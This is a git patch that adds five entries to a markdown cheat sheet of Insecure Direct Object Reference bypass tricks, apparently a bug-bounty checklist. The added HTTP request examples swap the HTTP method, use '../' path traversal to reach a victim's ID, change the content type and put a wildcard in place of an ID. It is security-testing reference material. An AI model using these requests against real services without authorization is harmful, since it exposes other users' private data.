From 4ef0eb014e857c29189c9fb3d0984cf70f8b7d88 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Fri, 25 Jun 2021 06:13:39 +0700
Subject: [PATCH] Update Insecure Direct Object References.md

---
 Insecure Direct Object References.md | 38 ++++++++++++++++++++++++++++
 1 file changed, 38 insertions(+)

diff --git a/Insecure Direct Object References.md b/Insecure Direct Object References.md
index d958bec..b956c1c 100644
--- a/Insecure Direct Object References.md	
+++ b/Insecure Direct Object References.md	
@@ -114,5 +114,43 @@ Try this to bypass
 GET /file?id=302
 ```
 
+12. Change HTTP Method
+```
+GET /api/v1/users/profile/111
+```
+Try this to bypass
+```
+POST /api/v1/users/profile/111
+```
+
+13. Path traversal
+```
+GET /api/v1/users/profile/victim_id
+```
+Try this to bypass
+```
+GET /api/v1/users/profile/my_id/../victim_id
+```
+
+14. Change request content type
+```
+Content-type: application/xml
+```
+Try this to bypass
+```
+Content-type: application/json
+```
+
+15. Send wildcard instead of ID
+```
+GET /api/users/111
+```
+Try this to bypass
+```
+GET /api/users/*
+```
+
+16. Try google dorking to find new endpoint
+
 Reference: 
 - [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup